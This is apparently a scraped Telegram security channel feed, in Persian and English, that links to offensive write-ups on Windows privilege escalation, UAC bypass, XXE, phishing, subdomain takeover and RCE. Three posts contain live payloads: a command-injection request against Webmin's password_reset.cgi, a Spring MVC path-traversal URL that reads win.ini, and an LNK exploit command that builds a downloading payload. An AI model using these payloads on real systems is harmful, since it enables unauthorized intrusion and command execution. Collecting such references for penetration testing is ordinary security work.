بالا بردن سطح دسترسی یوزر ویندوز تا سطح SYSTEM با سوء استفاده از Osquery
CVE-2019-3567
https://offsec.provadys.com/osquery-windows-acl-misconfiguration-eop.html
#windows
#privesc
#pentest
@sec_nerd
CVE-2019-3567
https://offsec.provadys.com/osquery-windows-acl-misconfiguration-eop.html
#windows
#privesc
#pentest
@sec_nerd
Red Team Techniques: Gaining access on an external engagement through spear-phishing
https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
#phishing
#spear_phishing
#msf
@sec_nerd
https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
#phishing
#spear_phishing
#msf
@sec_nerd
Bypassing Windows User Account Control: Back For More
https://medium.com/@z3roTrust/bypassing-windows-user-account-control-back-for-more-dd5672c48600
#windows
#pentest
#privesc
@sec_nerd
https://medium.com/@z3roTrust/bypassing-windows-user-account-control-back-for-more-dd5672c48600
#windows
#pentest
#privesc
@sec_nerd
Automating local DTD discovery for XXE exploitation
https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation
#xxe
#web
#pentest
@sec_nerd
https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation
#xxe
#web
#pentest
@sec_nerd
A Deep Dive into XXE Injection
https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
#xxe
#web
#pentest
@sec_nerd
https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
#xxe
#web
#pentest
@sec_nerd
CVE-2019–13382: Local Privilege Escalation in SnagIt
https://posts.specterops.io/cve-2019-13382-local-privilege-escalation-in-snagit-abe5f31c349
#windows
#pentest
#privesc
@sec_nerd
https://posts.specterops.io/cve-2019-13382-local-privilege-escalation-in-snagit-abe5f31c349
#windows
#pentest
#privesc
@sec_nerd
LNK Exploit
https://github.com/mortychannel/lnkexploit
نحوه اجرا:
python lnk.py -p download -l https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe -s payload.exe -i 1
POC:
https://youtu.be/AWGL28Qk4bA
#windows
#pentest
#exploit
@sec_nerd
https://github.com/mortychannel/lnkexploit
نحوه اجرا:
python lnk.py -p download -l https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe -s payload.exe -i 1
POC:
https://youtu.be/AWGL28Qk4bA
#windows
#pentest
#exploit
@sec_nerd
GitHub
GitHub - mortychannel/lnkexploit
Contribute to mortychannel/lnkexploit development by creating an account on GitHub.
[PoC] Analysis of Spring MVC Directory Traversal Vulnerability (CVE-2018-1271)
https://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
(link: https://paper.seebug.org/991/) paper.seebug.org/991/
#exploit
#Poc
@sec_nerd
https://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
(link: https://paper.seebug.org/991/) paper.seebug.org/991/
#exploit
#Poc
@sec_nerd
PowerShell: Get Last Domain Logon with Get-ADUserLastLogon
https://sid-500.com/2019/08/12/powershell-get-last-domain-logon-with-get-aduserlastlogon/
#windows
#ps
#security
@sec_nerd
https://sid-500.com/2019/08/12/powershell-get-last-domain-logon-with-get-aduserlastlogon/
#windows
#ps
#security
@sec_nerd
اساسیات حمله به زیردامنه وب سایتهای بزرگ
https://blog.cystack.net/subdomain-takeover/
https://blog.cystack.net/subdomain-takeover-chapter-two-azure-services/
#web
#pentest
#bugbounty
#subdomain
@sec_nerd
https://blog.cystack.net/subdomain-takeover/
https://blog.cystack.net/subdomain-takeover-chapter-two-azure-services/
#web
#pentest
#bugbounty
#subdomain
@sec_nerd
CyStack Security Blog
Subdomain takeover - Chapter one: Methodology
Subdomain takeover is a high severity vulnerability that can be exploited to
take control of a domain and pointing it to an address managed by attackers.
Attacks on this vulnerability are often used for the purpose of creating
phishing sites, spreading malwares.…
take control of a domain and pointing it to an address managed by attackers.
Attacks on this vulnerability are often used for the purpose of creating
phishing sites, spreading malwares.…
"Webmin 0day remote code execution"
PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
#webmin
#exploit
#rce
@sec_nerd
PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
#webmin
#exploit
#rce
@sec_nerd
راهکارهای جایگزین برای دستیابی به سطح دسترسی SYSTEM در ویندوز
https://blog.xpnsec.com/becoming-system/
#windows
#privesc
#pentest
@sec_nerd
https://blog.xpnsec.com/becoming-system/
#windows
#privesc
#pentest
@sec_nerd
Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708
https://github.com/dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-
#windows
#rdp
#rce
@sec_nerd
https://github.com/dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-
#windows
#rdp
#rce
@sec_nerd
GitHub
GitHub - dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-: rce exploit , made to work with…
rce exploit , made to work with pocsuite3. Contribute to dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708- development by creating an account on GitHub.
امنیت اطلاعات
"Webmin 0day remote code execution" PoC: /password_reset.cgi user=root&pam&expired&old=wrong | id https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html #webmin #exploit #rce @sec_nerd